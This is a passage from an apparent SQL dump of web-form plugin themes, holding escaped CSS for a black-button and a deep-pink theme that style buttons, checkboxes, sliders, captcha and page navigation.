#E6C18B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E6C18B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #F3CC92 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F3CC92 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3CC92 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5CB8F 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3CC92 ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3CC92 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5CB8F )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F3CC92 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3CC92 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5CB8F 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F3CC92 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3CC92 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5CB8F 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F3CC92 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3CC92 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5CB8F 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #F3CC92 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3CC92 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5CB8F 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n',0),(28,'Theme 08 transparent (black button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nmargin-bottom: 10px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #000000;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #000000;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #000;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #000;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #FFF;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(29,'Theme 08 deep pink','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #930049;\r\nmargin-bottom: 10px;\r\ncolor: #930049;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #930049 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        